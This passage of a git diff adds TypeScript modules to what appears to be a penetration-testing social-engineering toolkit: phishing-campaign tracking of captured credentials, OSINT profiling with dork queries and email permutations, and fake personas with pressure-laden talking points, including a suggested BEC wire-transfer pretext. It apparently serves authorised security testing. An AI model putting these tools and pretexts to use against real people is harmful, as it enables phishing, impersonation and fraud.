+      ipAddress: metadata?.ipAddress,
+    }
+
+    await SocEngStorage.storeCapturedCredential(credential)
+
+    // Process submit event
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (campaign) {
+      const target = campaign.targets.find((t) => t.id === targetId)
+      if (target) {
+        await processSubmitEvent(campaign, target, metadata)
+      }
+    }
+  }
+
+  // ========== Statistics ==========
+
+  /**
+   * Get tracking statistics for campaign.
+   */
+  export async function getTrackingStats(
+    campaignId: string
+  ): Promise<TrackingStats> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    const stats: TrackingStats = {
+      totalTargets: campaign.targets.length,
+      byStatus: {
+        pending: 0,
+        sent: 0,
+        delivered: 0,
+        bounced: 0,
+        opened: 0,
+        clicked: 0,
+        submitted: 0,
+        reported: 0,
+      },
+      openTimes: [],
+      clickTimes: [],
+      submitTimes: [],
+      userAgents: {},
+      geoLocations: {},
+    }
+
+    for (const target of campaign.targets) {
+      const status = target.status || "pending"
+      stats.byStatus[status]++
+
+      if (target.openedAt && status !== "pending") {
+        stats.openTimes.push(target.openedAt)
+      }
+      if (target.clickedAt) {
+        stats.clickTimes.push(target.clickedAt)
+      }
+      if (target.submittedAt) {
+        stats.submitTimes.push(target.submittedAt)
+      }
+    }
+
+    return stats
+  }
+
+  /**
+   * Tracking statistics.
+   */
+  export interface TrackingStats {
+    totalTargets: number
+    byStatus: Record<SocEngTypes.TargetStatus, number>
+    openTimes: number[]
+    clickTimes: number[]
+    submitTimes: number[]
+    userAgents: Record<string, number>
+    geoLocations: Record<string, number>
+  }
+
+  // ========== Report Generation ==========
+
+  /**
+   * Generate tracking report for a target.
+   */
+  export async function generateTargetReport(
+    campaignId: string,
+    targetId: string
+  ): Promise<TargetReport> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    const target = campaign.targets.find((t) => t.id === targetId)
+    if (!target) {
+      throw new Error(`Target not found: ${targetId}`)
+    }
+
+    const events = (await SocEngStorage.getEventsForCampaign(campaignId)).filter(
+      (e) => e.targetId === targetId
+    )
+
+    return {
+      target,
+      campaign: {
+        id: campaign.id,
+        name: campaign.name,
+        type: campaign.type,
+      },
+      timeline: events,
+      compromised: target.status === "submitted",
+      engagementLevel: calculateEngagementLevel(target),
+    }
+  }
+
+  /**
+   * Target report.
+   */
+  export interface TargetReport {
+    target: SocEngTypes.TargetWithStatus
+    campaign: {
+      id: string
+      name: string
+      type: SocEngTypes.CampaignType
+    }
+    timeline: SocEngTypes.TimelineEvent[]
+    compromised: boolean
+    engagementLevel: "none" | "opened" | "clicked" | "compromised"
+  }
+
+  /**
+   * Calculate engagement level.
+   */
+  function calculateEngagementLevel(
+    target: SocEngTypes.TargetWithStatus
+  ): "none" | "opened" | "clicked" | "compromised" {
+    const status = target.status || "pending"
+    if (status === "submitted") return "compromised"
+    if (status === "clicked") return "clicked"
+    if (status === "opened") return "opened"
+    return "none"
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format tracking stats for display.
+   */
+  export function formatTrackingStats(stats: TrackingStats): string {
+    const lines: string[] = []
+
+    lines.push("Tracking Statistics")
+    lines.push("=".repeat(40))
+    lines.push(`Total Targets: ${stats.totalTargets}`)
+    lines.push("")
+    lines.push("By Status:")
+    lines.push(`  Pending: ${stats.byStatus.pending}`)
+    lines.push(`  Sent: ${stats.byStatus.sent}`)
+    lines.push(`  Opened: ${stats.byStatus.opened}`)
+    lines.push(`  Clicked: ${stats.byStatus.clicked}`)
+    lines.push(`  Submitted: ${stats.byStatus.submitted}`)
+    lines.push(`  Reported: ${stats.byStatus.reported}`)
+
+    const total = stats.totalTargets
+    if (total > 0) {
+      lines.push("")
+      lines.push("Rates:")
+      const opened = stats.byStatus.opened + stats.byStatus.clicked + stats.byStatus.submitted
+      const clicked = stats.byStatus.clicked + stats.byStatus.submitted
+      const submitted = stats.byStatus.submitted
+
+      lines.push(`  Open Rate: ${((opened / total) * 100).toFixed(1)}%`)
+      lines.push(`  Click Rate: ${((clicked / total) * 100).toFixed(1)}%`)
+      lines.push(`  Submit Rate: ${((submitted / total) * 100).toFixed(1)}%`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/pretexting/index.ts b/packages/opencode/src/pentest/soceng/pretexting/index.ts
new file mode 100644
index 00000000000..5c11ab103c7
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/pretexting/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Pretexting Module
+ *
+ * Social engineering pretexting scenarios, personas, and scripts.
+ *
+ * @module pentest/soceng/pretexting
+ */
+
+export { PretextingScenarios } from "./scenarios"
+export { PretextingPersonas } from "./personas"
+export { PretextingScripts } from "./scripts"
+export { PretextingOSINT } from "./osint"
diff --git a/packages/opencode/src/pentest/soceng/pretexting/osint.ts b/packages/opencode/src/pentest/soceng/pretexting/osint.ts
new file mode 100644
index 00000000000..a776f83c7a2
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/pretexting/osint.ts
@@ -0,0 +1,609 @@
+/**
+ * @fileoverview OSINT for Pretexting
+ *
+ * Open Source Intelligence gathering to support pretext development.
+ *
+ * @module pentest/soceng/pretexting/osint
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { SocEngEvents } from "../events"
+
+/**
+ * Pretexting OSINT namespace.
+ */
+export namespace PretextingOSINT {
+  // ========== OSINT Types ==========
+
+  /**
+   * OSINT target profile.
+   */
+  export interface TargetProfile {
+    id: string
+    name: string
+    email?: string
+    phone?: string
+    organization: OrganizationInfo
+    position: PositionInfo
+    socialMedia: SocialMediaPresence
+    publicInfo: PublicInformation
+    relationships: PersonRelationship[]
+    notes: string[]
+    confidence: "low" | "medium" | "high"
+    sources: string[]
+    lastUpdated: number
+  }
+
+  /**
+   * Organization information.
+   */
+  export interface OrganizationInfo {
+    name: string
+    domain?: string
+    industry?: string
+    size?: string
+    locations?: string[]
+    linkedinUrl?: string
+    website?: string
+  }
+
+  /**
+   * Position information.
+   */
+  export interface PositionInfo {
+    title?: string
+    department?: string
+    startDate?: string
+    responsibilities?: string[]
+    reportingTo?: string
+  }
+
+  /**
+   * Social media presence.
+   */
+  export interface SocialMediaPresence {
+    linkedin?: string
+    twitter?: string
+    facebook?: string
+    github?: string
+    other?: Record<string, string>
+  }
+
+  /**
+   * Public information.
+   */
+  export interface PublicInformation {
+    education?: string[]
+    certifications?: string[]
+    publications?: string[]
+    presentations?: string[]
+    interests?: string[]
+    awards?: string[]
+  }
+
+  /**
+   * Person relationship.
+   */
+  export interface PersonRelationship {
+    name: string
+    relationship: string
+    title?: string
+    linkedinUrl?: string
+  }
+
+  // ========== OSINT Sources ==========
+
+  /**
+   * OSINT source definition.
+   */
+  export interface OSINTSource {
+    id: string
+    name: string
+    type: "search" | "social" | "corporate" | "breach" | "public-records"
+    description: string
+    queryPattern: string
+    automatable: boolean
+  }
+
+  /**
+   * Common OSINT sources.
+   */
+  export const OSINT_SOURCES: OSINTSource[] = [
+    {
+      id: "linkedin",
+      name: "LinkedIn",
+      type: "social",
+      description: "Professional networking profiles",
+      queryPattern: "site:linkedin.com/in/ \"{name}\" \"{company}\"",
+      automatable: false,
+    },
+    {
+      id: "google",
+      name: "Google Search",
+      type: "search",
+      description: "General web search",
+      queryPattern: "\"{name}\" \"{company}\" filetype:pdf|doc|xls",
+      automatable: true,
+    },
+    {
+      id: "google-email",
+      name: "Google Email Search",
+      type: "search",
+      description: "Search for email addresses",
+      queryPattern: "\"{domain}\" \"@{domain}\" email",
+      automatable: true,
+    },
+    {
+      id: "hunter",
+      name: "Hunter.io",
+      type: "corporate",
+      description: "Email finder and verification",
+      queryPattern: "API: domain={domain}",
+      automatable: true,
+    },
+    {
+      id: "hibp",
+      name: "Have I Been Pwned",
+      type: "breach",
+      description: "Breach database search",
+      queryPattern: "API: email={email}",
+      automatable: true,
+    },
+    {
+      id: "github",
+      name: "GitHub",
+      type: "social",
+      description: "Code repositories and contributions",
+      queryPattern: "site:github.com \"{name}\" \"{company}\"",
+      automatable: true,
+    },
+    {
+      id: "twitter",
+      name: "Twitter/X",
+      type: "social",
+      description: "Social media posts",
+      queryPattern: "from:{username} OR \"{name}\"",
+      automatable: true,
+    },
+    {
+      id: "whois",
+      name: "WHOIS",
+      type: "public-records",
+      description: "Domain registration information",
+      queryPattern: "whois {domain}",
+      automatable: true,
+    },
+    {
+      id: "dns",
+      name: "DNS Records",
+      type: "corporate",
+      description: "DNS enumeration",
+      queryPattern: "dig {domain} any",
+      automatable: true,
+    },
+    {
+      id: "company-house",
+      name: "Company Registries",
+      type: "public-records",
+      description: "Corporate filings and officers",
+      queryPattern: "company={company}",
+      automatable: false,
+    },
+  ]
+
+  // ========== Search Query Generation ==========
+
+  /**
+   * Generate OSINT search queries.
+   */
+  export function generateSearchQueries(
+    name: string,
+    company?: string,
+    domain?: string
+  ): Record<string, string> {
+    const queries: Record<string, string> = {}
+
+    // LinkedIn search
+    queries.linkedin = `site:linkedin.com/in/ "${name}"${company ? ` "${company}"` : ""}`
+
+    // General Google dork
+    queries.google = `"${name}"${company ? ` "${company}"` : ""}`
+
+    // Email pattern search
+    if (domain) {
+      queries.email = `"${domain}" "@${domain}" "${name}"`
+    }
+
+    // Document search
+    queries.documents = `"${name}"${company ? ` OR "${company}"` : ""} filetype:pdf OR filetype:doc OR filetype:xls`
+
+    // GitHub search
+    queries.github = `site:github.com "${name}"${company ? ` "${company}"` : ""}`
+
+    // Twitter search
+    queries.twitter = `"${name}"${company ? ` "${company}"` : ""} site:twitter.com`
+
+    // Conference/presentation search
+    queries.presentations = `"${name}" (conference OR presentation OR speaker OR webinar)${company ? ` "${company}"` : ""}`
+
+    return queries
+  }
+
+  /**
+   * Generate email permutations.
+   */
+  export function generateEmailPermutations(
+    firstName: string,
+    lastName: string,
+    domain: string
+  ): string[] {
+    const first = firstName.toLowerCase()
+    const last = lastName.toLowerCase()
+    const firstInitial = first[0]
+    const lastInitial = last[0]
+
+    return [
+      `${first}.${last}@${domain}`,
+      `${first}${last}@${domain}`,
+      `${firstInitial}${last}@${domain}`,
+      `${first}${lastInitial}@${domain}`,
+      `${first}_${last}@${domain}`,
+      `${first}-${last}@${domain}`,
+      `${last}.${first}@${domain}`,
+      `${last}${first}@${domain}`,
+      `${firstInitial}.${last}@${domain}`,
+      `${first}@${domain}`,
+    ]
+  }
+
+  // ========== Profile Building ==========
+
+  /**
+   * Create empty target profile.
+   */
+  export function createProfile(name: string): TargetProfile {
+    return {
+      id: SocEngStorage.createOsintId(),
+      name,
+      organization: { name: "" },
+      position: {},
+      socialMedia: {},
+      publicInfo: {},
+      relationships: [],
+      notes: [],
+      confidence: "low",
+      sources: [],
+      lastUpdated: Date.now(),
+    }
+  }
+
+  /**
+   * Merge profile data from different sources.
+   */
+  export function mergeProfileData(
+    base: TargetProfile,
+    newData: Partial<TargetProfile>
+  ): TargetProfile {
+    const merged: TargetProfile = { ...base }
+
+    if (newData.email && !merged.email) merged.email = newData.email
+    if (newData.phone && !merged.phone) merged.phone = newData.phone
+
+    if (newData.organization) {
+      merged.organization = { ...merged.organization, ...newData.organization }
+    }
+
+    if (newData.position) {
+      merged.position = { ...merged.position, ...newData.position }
+    }
+
+    if (newData.socialMedia) {
+      merged.socialMedia = { ...merged.socialMedia, ...newData.socialMedia }
+    }
+
+    if (newData.publicInfo) {
+      merged.publicInfo = {
+        education: [
+          ...(merged.publicInfo.education || []),
+          ...(newData.publicInfo.education || []),
+        ],
+        certifications: [
+          ...(merged.publicInfo.certifications || []),
+          ...(newData.publicInfo.certifications || []),
+        ],
+        interests: [
+          ...(merged.publicInfo.interests || []),
+          ...(newData.publicInfo.interests || []),
+        ],
+      }
+    }
+
+    if (newData.relationships) {
+      merged.relationships = [...merged.relationships, ...newData.relationships]
+    }
+
+    if (newData.sources) {
+      merged.sources = [...new Set([...merged.sources, ...newData.sources])]
+    }
+
+    // Update confidence based on data completeness
+    merged.confidence = calculateConfidence(merged)
+    merged.lastUpdated = Date.now()
+
+    return merged
+  }
+
+  /**
+   * Calculate profile confidence level.
+   */
+  function calculateConfidence(
+    profile: TargetProfile
+  ): "low" | "medium" | "high" {
+    let score = 0
+
+    if (profile.email) score += 2
+    if (profile.phone) score += 1
+    if (profile.organization.name) score += 1
+    if (profile.position.title) score += 2
+    if (profile.position.department) score += 1
+    if (profile.socialMedia.linkedin) score += 2
+    if (profile.relationships.length > 0) score += 2
+    if (profile.sources.length > 2) score += 2
+
+    if (score >= 10) return "high"
+    if (score >= 5) return "medium"
+    return "low"
+  }
+
+  // ========== OSINT Record Conversion ==========
+
+  /**
+   * Convert profile to OSINT record.
+   */
+  export function toOSINTRecord(profile: TargetProfile): SocEngTypes.OSINT {
+    return {
+      id: profile.id,
+      targetId: profile.id,
+      type: "combined",
+      source: profile.sources.join(", "),
+      data: {
+        name: profile.name,
+        email: profile.email,
+        phone: profile.phone,
+        organization: profile.organization,
+        position: profile.position,
+        socialMedia: profile.socialMedia,
+        publicInfo: profile.publicInfo,
+        relationships: profile.relationships,
+      },
+      confidence: profile.confidence,
+      timestamp: profile.lastUpdated,
+    }
+  }
+
+  // ========== Pretext Intelligence ==========
+
+  /**
+   * Extract pretext-relevant intelligence from profile.
+   */
+  export function extractPretextIntel(
+    profile: TargetProfile
+  ): PretextIntelligence {
+    return {
+      personalDetails: {
+        name: profile.name,
+        email: profile.email,
+        phone: profile.phone,
+      },
+      workDetails: {
+        company: profile.organization.name,
+        title: profile.position.title,
+        department: profile.position.department,
+        manager: profile.position.reportingTo,
+      },
+      socialEngineering: {
+        // Identify hooks for social engineering
+        interests: profile.publicInfo.interests || [],
+        connections: profile.relationships
+          .filter((r) => r.relationship === "colleague" || r.relationship === "manager")
+          .map((r) => r.name),
+        publicPresence: Object.keys(profile.socialMedia).filter(
+          (k) => profile.socialMedia[k as keyof SocialMediaPresence]
+        ),
+      },
+      usefulForPretext: generatePretextSuggestions(profile),
+    }
+  }
+
+  /**
+   * Pretext intelligence summary.
+   */
+  export interface PretextIntelligence {
+    personalDetails: {
+      name: string
+      email?: string
+      phone?: string
+    }
+    workDetails: {
+      company: string
+      title?: string
+      department?: string
+      manager?: string
+    }
+    socialEngineering: {
+      interests: string[]
+      connections: string[]
+      publicPresence: string[]
+    }
+    usefulForPretext: string[]
+  }
+
+  /**
+   * Generate pretext suggestions based on profile.
+   */
+  function generatePretextSuggestions(profile: TargetProfile): string[] {
+    const suggestions: string[] = []
+
+    if (profile.position.title?.toLowerCase().includes("manager")) {
+      suggestions.push("Target has managerial authority - may approve requests")
+    }
+
+    if (profile.position.department?.toLowerCase().includes("finance")) {
+      suggestions.push("Finance department - potential for BEC/wire transfer pretext")
+    }
+
+    if (profile.position.department?.toLowerCase().includes("hr")) {
+      suggestions.push("HR department - access to employee PII")
+    }
+
+    if (profile.socialMedia.linkedin) {
+      suggestions.push("Active LinkedIn presence - use for connection validation")
+    }
+
+    if (profile.relationships.length > 0) {
+      suggestions.push(
+        `Known relationships: ${profile.relationships.map((r) => r.name).join(", ")}`
+      )
+    }
+
+    if (profile.publicInfo.interests?.length) {
+      suggestions.push(
+        `Interests for rapport building: ${profile.publicInfo.interests.join(", ")}`
+      )
+    }
+
+    return suggestions
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format profile for display.
+   */
+  export function formatProfile(profile: TargetProfile): string {
+    const lines: string[] = []
+
+    lines.push(`Target Profile: ${profile.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Confidence: ${profile.confidence.toUpperCase()}`)
+    lines.push("")
+
+    lines.push("Contact Information:")
+    if (profile.email) lines.push(`  Email: ${profile.email}`)
+    if (profile.phone) lines.push(`  Phone: ${profile.phone}`)
+    lines.push("")
+
+    lines.push("Organization:")
+    lines.push(`  Company: ${profile.organization.name || "Unknown"}`)
+    if (profile.organization.domain)
+      lines.push(`  Domain: ${profile.organization.domain}`)
+    if (profile.organization.industry)
+      lines.push(`  Industry: ${profile.organization.industry}`)
+    lines.push("")
+
+    lines.push("Position:")
+    if (profile.position.title) lines.push(`  Title: ${profile.position.title}`)
+    if (profile.position.department)
+      lines.push(`  Department: ${profile.position.department}`)
+    if (profile.position.reportingTo)
+      lines.push(`  Reports To: ${profile.position.reportingTo}`)
+    lines.push("")
+
+    if (Object.keys(profile.socialMedia).length > 0) {
+      lines.push("Social Media:")
+      if (profile.socialMedia.linkedin)
+        lines.push(`  LinkedIn: ${profile.socialMedia.linkedin}`)
+      if (profile.socialMedia.twitter)
+        lines.push(`  Twitter: ${profile.socialMedia.twitter}`)
+      if (profile.socialMedia.github)
+        lines.push(`  GitHub: ${profile.socialMedia.github}`)
+      lines.push("")
+    }
+
+    if (profile.relationships.length > 0) {
+      lines.push("Known Relationships:")
+      for (const rel of profile.relationships.slice(0, 5)) {
+        lines.push(`  • ${rel.name} (${rel.relationship})`)
+      }
+      if (profile.relationships.length > 5) {
+        lines.push(`  ... and ${profile.relationships.length - 5} more`)
+      }
+      lines.push("")
+    }
+
+    lines.push("Sources:")
+    for (const source of profile.sources) {
+      lines.push(`  • ${source}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format OSINT sources list.
+   */
+  export function formatSources(): string {
+    const lines: string[] = []
+
+    lines.push("OSINT Sources")
+    lines.push("=".repeat(40))
+
+    const byType: Record<string, OSINTSource[]> = {}
+    for (const source of OSINT_SOURCES) {
+      if (!byType[source.type]) byType[source.type] = []
+      byType[source.type].push(source)
+    }
+
+    for (const [type, sources] of Object.entries(byType)) {
+      lines.push("")
+      lines.push(`${type.toUpperCase()}:`)
+      for (const source of sources) {
+        const auto = source.automatable ? "✓" : "✗"
+        lines.push(`  ${auto} ${source.name}: ${source.description}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format pretext intelligence.
+   */
+  export function formatPretextIntel(intel: PretextIntelligence): string {
+    const lines: string[] = []
+
+    lines.push("Pretext Intelligence Summary")
+    lines.push("=".repeat(40))
+    lines.push("")
+
+    lines.push(`Name: ${intel.personalDetails.name}`)
+    if (intel.personalDetails.email) lines.push(`Email: ${intel.personalDetails.email}`)
+    lines.push("")
+
+    lines.push("Work Information:")
+    lines.push(`  Company: ${intel.workDetails.company}`)
+    if (intel.workDetails.title) lines.push(`  Title: ${intel.workDetails.title}`)
+    if (intel.workDetails.department) lines.push(`  Dept: ${intel.workDetails.department}`)
+    if (intel.workDetails.manager) lines.push(`  Manager: ${intel.workDetails.manager}`)
+    lines.push("")
+
+    if (intel.socialEngineering.connections.length > 0) {
+      lines.push("Known Connections:")
+      for (const conn of intel.socialEngineering.connections) {
+        lines.push(`  • ${conn}`)
+      }
+      lines.push("")
+    }
+
+    if (intel.usefulForPretext.length > 0) {
+      lines.push("Pretext Suggestions:")
+      for (const suggestion of intel.usefulForPretext) {
+        lines.push(`  💡 ${suggestion}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/pretexting/personas.ts b/packages/opencode/src/pentest/soceng/pretexting/personas.ts
new file mode 100644
index 00000000000..5dc165dfce7
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/pretexting/personas.ts
@@ -0,0 +1,648 @@
+/**
+ * @fileoverview Pretexting Personas
+ *
+ * Fake identity management for social engineering pretexts.
+ *
+ * @module pentest/soceng/pretexting/personas
+ */
+
+import { SocEngStorage } from "../storage"
+
+/**
+ * Pretexting personas namespace.
+ */
+export namespace PretextingPersonas {
+  // ========== Persona Types ==========
+
+  /**
+   * Persona definition.
+   */
+  export interface Persona {
+    id: string
+    name: string
+    role: string
+    organization: string
+    department?: string
+    email?: string
+    phone?: string
+    backstory: string
+    traits: PersonalityTraits
+    expertise: string[]
+    vocabulary: string[]
+    talkingPoints: string[]
+    avoidTopics: string[]
+    createdAt: number
+  }
+
+  /**
+   * Personality traits.
+   */
+  export interface PersonalityTraits {
+    tone: "formal" | "casual" | "friendly" | "authoritative"
+    urgency: "low" | "medium" | "high"
+    helpfulness: "low" | "medium" | "high"
+    patience: "low" | "medium" | "high"
+  }
+
+  // ========== Built-in Personas ==========
+
+  /**
+   * IT Help Desk persona.
+   */
+  export const IT_HELPDESK: Persona = {
+    id: "it-helpdesk",
+    name: "Alex Thompson",
+    role: "IT Support Technician",
+    organization: "IT Department",
+    department: "Help Desk",
+    backstory: "Been with the company for 3 years. Works the day shift on the help desk. Handles password resets, software issues, and general IT questions. Friendly but sometimes busy.",
+    traits: {
+      tone: "friendly",
+      urgency: "medium",
+      helpfulness: "high",
+      patience: "high",
+    },
+    expertise: [
+      "Password resets",
+      "Software installation",
+      "Email configuration",
+      "VPN setup",
+      "Account management",
+    ],
+    vocabulary: [
+      "ticket",
+      "incident",
+      "remote session",
+      "endpoint",
+      "authentication",
+      "MFA",
+      "Active Directory",
+      "service desk",
+    ],
+    talkingPoints: [
+      "We've had a lot of tickets today",
+      "This should only take a few minutes",
+      "I just need to verify some information",
+      "Let me pull up your account",
+      "Have you tried restarting?",
+    ],
+    avoidTopics: [
+      "Security policies in detail",
+      "Network architecture",
+      "Specific system passwords",
+      "Other employees' issues",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * IT Security persona.
+   */
+  export const IT_SECURITY: Persona = {
+    id: "it-security",
+    name: "Jordan Mitchell",
+    role: "Information Security Analyst",
+    organization: "IT Security",
+    department: "Security Operations",
+    backstory: "Security professional with 5 years experience. Handles incident response, security awareness, and policy enforcement. Professional and thorough.",
+    traits: {
+      tone: "authoritative",
+      urgency: "high",
+      helpfulness: "medium",
+      patience: "medium",
+    },
+    expertise: [
+      "Incident response",
+      "Security awareness",
+      "Threat detection",
+      "Compliance",
+      "Forensics",
+    ],
+    vocabulary: [
+      "threat",
+      "compromise",
+      "indicator",
+      "incident",
+      "breach",
+      "vulnerability",
+      "patch",
+      "compliance",
+      "audit",
+    ],
+    talkingPoints: [
+      "We detected unusual activity",
+      "This is a security matter",
+      "I need your immediate attention",
+      "This is time-sensitive",
+      "For your protection",
+    ],
+    avoidTopics: [
+      "Specific vulnerabilities in production",
+      "Other security incidents",
+      "Exact security tools used",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * HR Benefits persona.
+   */
+  export const HR_BENEFITS: Persona = {
+    id: "hr-benefits",
+    name: "Sarah Chen",
+    role: "Benefits Coordinator",
+    organization: "Human Resources",
+    department: "Benefits Administration",
+    backstory: "HR professional focused on employee benefits. Handles enrollment, questions, and life events. Helpful and detail-oriented.",
+    traits: {
+      tone: "friendly",
+      urgency: "medium",
+      helpfulness: "high",
+      patience: "high",
+    },
+    expertise: [
+      "Health insurance",
+      "401k plans",
+      "Open enrollment",
+      "Life events",
+      "COBRA",
+    ],
+    vocabulary: [
+      "enrollment",
+      "coverage",
+      "dependent",
+      "premium",
+      "deductible",
+      "copay",
+      "FSA",
+      "HSA",
+      "life event",
+    ],
+    talkingPoints: [
+      "I want to make sure you're covered",
+      "The deadline is approaching",
+      "This affects your benefits",
+      "Let me help you with this",
+      "I see your file here",
+    ],
+    avoidTopics: [
+      "Specific salary information",
+      "Other employees' benefits",
+      "Company financials",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * Executive Assistant persona.
+   */
+  export const EXEC_ASSISTANT: Persona = {
+    id: "exec-assistant",
+    name: "Michael Roberts",
+    role: "Executive Assistant",
+    organization: "Executive Office",
+    department: "C-Suite Support",
+    backstory: "Assistant to the CEO for 2 years. Manages scheduling, communications, and special projects. Professional and discreet.",
+    traits: {
+      tone: "formal",
+      urgency: "high",
+      helpfulness: "medium",
+      patience: "low",
+    },
+    expertise: [
+      "Executive scheduling",
+      "Meeting coordination",
+      "Travel arrangements",
+      "Communications",
+    ],
+    vocabulary: [
+      "the CEO",
+      "urgent",
+      "confidential",
+      "priority",
+      "immediately",
+      "discretion",
+      "executive team",
+    ],
+    talkingPoints: [
+      "The CEO asked me to reach out",
+      "This is confidential",
+      "Time is of the essence",
+      "I need your help with this",
+      "Can you handle this discreetly?",
+    ],
+    avoidTopics: [
+      "CEO's schedule details",
+      "Strategic plans",
+      "Board matters",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * Vendor Account Manager persona.
+   */
+  export const VENDOR_ACCOUNT_MGR: Persona = {
+    id: "vendor-account-mgr",
+    name: "David Wilson",
+    role: "Account Manager",
+    organization: "[Vendor Name]",
+    department: "Client Services",
+    backstory: "Account manager for corporate clients. Handles relationship management and billing inquiries. Professional and solution-oriented.",
+    traits: {
+      tone: "formal",
+      urgency: "medium",
+      helpfulness: "high",
+      patience: "high",
+    },
+    expertise: [
+      "Account management",
+      "Billing",
+      "Contract renewals",
+      "Service issues",
+    ],
+    vocabulary: [
+      "account",
+      "invoice",
+      "payment",
+      "contract",
+      "renewal",
+      "service agreement",
+      "SLA",
+    ],
+    talkingPoints: [
+      "I'm your dedicated account manager",
+      "I wanted to reach out personally",
+      "To better serve you",
+      "Regarding your account",
+      "We value our partnership",
+    ],
+    avoidTopics: [
+      "Competitor details",
+      "Internal pricing structures",
+      "Other client accounts",
+    ],
+    createdAt: Date.now(),
+  }
+
+  /**
+   * All built-in personas.
+   */
+  export const ALL_PERSONAS: Persona[] = [
+    IT_HELPDESK,
+    IT_SECURITY,
+    HR_BENEFITS,
+    EXEC_ASSISTANT,
+    VENDOR_ACCOUNT_MGR,
+  ]
+
+  // ========== Persona Operations ==========
+
+  /**
+   * Get all personas.
+   */
+  export function getPersonas(): Persona[] {
+    return ALL_PERSONAS
+  }
+
+  /**
+   * Get persona by ID.
+   */
+  export function getPersona(personaId: string): Persona | undefined {
+    return ALL_PERSONAS.find((p) => p.id === personaId)
+  }
+
+  /**
+   * Get personas by role type.
+   */
+  export function getByRole(roleKeyword: string): Persona[] {
+    const lower = roleKeyword.toLowerCase()
+    return ALL_PERSONAS.filter(
+      (p) =>
+        p.role.toLowerCase().includes(lower) ||
+        p.organization.toLowerCase().includes(lower)
+    )
+  }
+
+  // ========== Persona Generation ==========
+
+  /**
+   * Persona generation options.
+   */
+  export interface GeneratePersonaOptions {
+    role: string
+    organization: string
+    department?: string
+    tone?: PersonalityTraits["tone"]
+    urgency?: PersonalityTraits["urgency"]
+  }
+
+  /**
+   * Generate a custom persona.
+   */
+  export function generatePersona(options: GeneratePersonaOptions): Persona {
+    const name = generateName()
+    const email = generateEmail(name, options.organization)
+
+    return {
+      id: SocEngStorage.createPersonaId(),
+      name,
+      role: options.role,
+      organization: options.organization,
+      department: options.department,
+      email,
+      backstory: generateBackstory(options),
+      traits: {
+        tone: options.tone || "formal",
+        urgency: options.urgency || "medium",
+        helpfulness: "medium",
+        patience: "medium",
+      },
+      expertise: generateExpertise(options.role),
+      vocabulary: generateVocabulary(options.role),
+      talkingPoints: generateTalkingPoints(options),
+      avoidTopics: [],
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate random name.
+   */
+  function generateName(): string {
+    const firstNames = [
+      "Alex", "Jordan", "Taylor", "Morgan", "Casey",
+      "Jamie", "Riley", "Avery", "Quinn", "Reese",
+      "Michael", "Sarah", "David", "Jennifer", "Robert",
+      "Jessica", "Christopher", "Amanda", "Matthew", "Ashley",
+    ]
+    const lastNames = [
+      "Smith", "Johnson", "Williams", "Brown", "Jones",
+      "Garcia", "Miller", "Davis", "Rodriguez", "Martinez",
+      "Anderson", "Taylor", "Thomas", "Hernandez", "Moore",
+    ]
+
+    const firstName = firstNames[Math.floor(Math.random() * firstNames.length)]
+    const lastName = lastNames[Math.floor(Math.random() * lastNames.length)]
+
+    return `${firstName} ${lastName}`
+  }
+
+  /**
+   * Generate email for persona.
+   */
+  function generateEmail(name: string, organization: string): string {
+    const [first, last] = name.toLowerCase().split(" ")
+    const domain = organization.toLowerCase().replace(/\s+/g, "") + ".com"
+    const formats = [
+      `${first}.${last}@${domain}`,
+      `${first[0]}${last}@${domain}`,
+      `${first}${last[0]}@${domain}`,
+    ]
+    return formats[Math.floor(Math.random() * formats.length)]
+  }
+
+  /**
+   * Generate backstory.
+   */
+  function generateBackstory(options: GeneratePersonaOptions): string {
+    const years = Math.floor(Math.random() * 8) + 1
+    return `${options.role} at ${options.organization}${options.department ? ` in ${options.department}` : ""}. Has been in this role for ${years} year${years > 1 ? "s" : ""}. Handles day-to-day operations and client/employee interactions.`
+  }
+
+  /**
+   * Generate expertise based on role.
+   */
+  function generateExpertise(role: string): string[] {
+    const lower = role.toLowerCase()
+    if (lower.includes("it") || lower.includes("tech")) {
+      return ["Technical support", "System administration", "Troubleshooting"]
+    }
+    if (lower.includes("hr") || lower.includes("human")) {
+      return ["Employee relations", "Benefits", "Policies"]
+    }
+    if (lower.includes("finance") || lower.includes("account")) {
+      return ["Financial reporting", "Billing", "Accounts payable"]
+    }
+    return ["Client relations", "Operations", "Communications"]
+  }
+
+  /**
+   * Generate vocabulary based on role.
+   */
+  function generateVocabulary(role: string): string[] {
+    const lower = role.toLowerCase()
+    if (lower.includes("it") || lower.includes("tech")) {
+      return ["system", "ticket", "access", "account", "update"]
+    }
+    if (lower.includes("hr") || lower.includes("human")) {
+      return ["policy", "enrollment", "benefits", "compliance"]
+    }
+    if (lower.includes("finance") || lower.includes("account")) {
+      return ["invoice", "payment", "budget", "expense"]
+    }
+    return ["account", "service", "support", "follow-up"]
+  }
+
+  /**
+   * Generate talking points.
+   */
+  function generateTalkingPoints(options: GeneratePersonaOptions): string[] {
+    return [
+      `I'm with ${options.organization}`,
+      "I'm reaching out regarding your account",
